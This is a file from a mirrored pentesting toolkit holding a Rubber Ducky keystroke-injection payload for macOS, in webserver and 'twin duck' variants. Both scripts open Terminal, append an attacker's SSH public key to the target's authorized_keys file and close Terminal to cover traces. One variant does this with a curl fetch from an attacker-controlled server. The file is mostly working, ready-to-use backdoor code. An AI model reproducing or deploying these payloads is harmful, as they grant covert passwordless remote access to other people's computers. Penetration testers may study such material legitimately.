Git-Mirrors/sec-pentesting-toolkit
1
0
Fork 0
mirror of https://github.com/autistic-symposium/sec-pentesting-toolkit.git synced 2025-04-27 11:09:09 -04:00
Code Issues Packages Projects Releases Wiki Activity
sec-pentesting-toolkit/Rubber_Duck/pwn/osx/ssh_access.txt
Mari Wahl 2afd831662 Reorganized
2014-11-03 10:49:17 -05:00

53 lines
2.2 KiB
Plaintext
Raw Blame History

This script adds an ssh public key to the authorized_keys file on a target's mac. After running you can connect to the target computer with ssh targetuser@targetcomputer and you will be granted access without a password. This a good alternative to the OS X User Backdoor payload. There are methods you can use: the web server method, and the twin duck method. The web server method requires you to have a web server (that the target can connect to), and you also must put your id_rsa.pub on your webserver. The twin duck method requires you to have the Twin Duck firmware flashed onto your ducky, and your id_rsa.pub needs to be at the root of the sd card. Also you need to name your ducky's sd card DUCKY. For more information on generating an id_rsa.pub read this (steps 1 & 2). Note: I reccomend you use duckencoder 2.6.3 to encode these payloads.
Webserver Method
Replace SERVER with the address of your webserver.
REM Title: OS X Get SSH access
REM Author: Jesse Wallace (c0deous)
REM This script adds a ssh public key to the authorized_keys file on a target's mac.
DELAY 1000
COMMAND SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 800
STRING curl http://SERVER/id_rsa.pub >> ~/.ssh/authorized_keys
ENTER
DELAY 1000
STRING killall Terminal
ENTER
REM Note: you may shorten the times if you think they are too slow. I made them to accommodate older macs that can't get around very fast.
Twin Duck Method
Requires the Twin Duck firmware to work. Instructions for flashing the firmware can be found here. After installing the firmware you need to rename the sd card to DUCKY.
REM Title: OS X Get SSH access (twin duck version)
REM Author: Jesse Wallace (c0deous)
REM This script adds the public ssh key of your attacker computer to the
REM authorized_keys file in the computers ~/.ssh directory.
DELAY 1000
COMMAND SPACE
DELAY 800
STRING Terminal
DELAY 500
ENTER
DELAY 500
STRING cat /Volumes/DUCKY/id_rsa.pub >> ~/.ssh/authorized_keys
ENTER
DELAY 250
STRING diskutil unmount /Volumes/DUCKY
ENTER
DELAY 800
STRING killall Terminal
ENTER
REM Note: you must quickly unplug your ducky as soon as this is done because if you wait too long it will remount the mass storage and when you disconnect
REM it from the computer it may corrupt the sd card (this has happened to me before)
Reference in New Issue View Git Blame Copy Permalink